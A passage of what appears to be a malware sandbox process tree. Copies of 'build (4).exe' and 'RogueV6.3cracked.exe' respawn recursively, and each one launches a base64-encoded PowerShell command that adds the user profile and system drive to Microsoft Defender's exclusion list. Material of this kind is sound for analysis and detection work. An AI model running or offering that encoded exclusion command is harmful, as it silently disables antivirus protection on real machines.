        109⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        110⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        110⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        110⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        111⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        111⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        111⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        112⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        112⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        112⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        113⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        113⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        113⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        114⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        114⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        114⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        115⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        115⤵
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        115⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        116⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        116⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        116⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        117⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        117⤵
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        117⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        118⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        118⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        118⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        119⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        119⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        119⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        120⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        120⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        120⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        121⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        121⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        121⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        122⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        122⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        122⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        123⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        123⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        123⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        124⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        124⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        124⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        125⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        125⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        125⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        126⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        126⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        126⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        127⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        127⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        127⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        128⤵
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        128⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        128⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        129⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        129⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        129⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        130⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        130⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        130⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        131⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        131⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        131⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        132⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        132⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        132⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        133⤵
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        133⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        133⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        134⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        134⤵
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        134⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        135⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        135⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        135⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        136⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        136⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        136⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
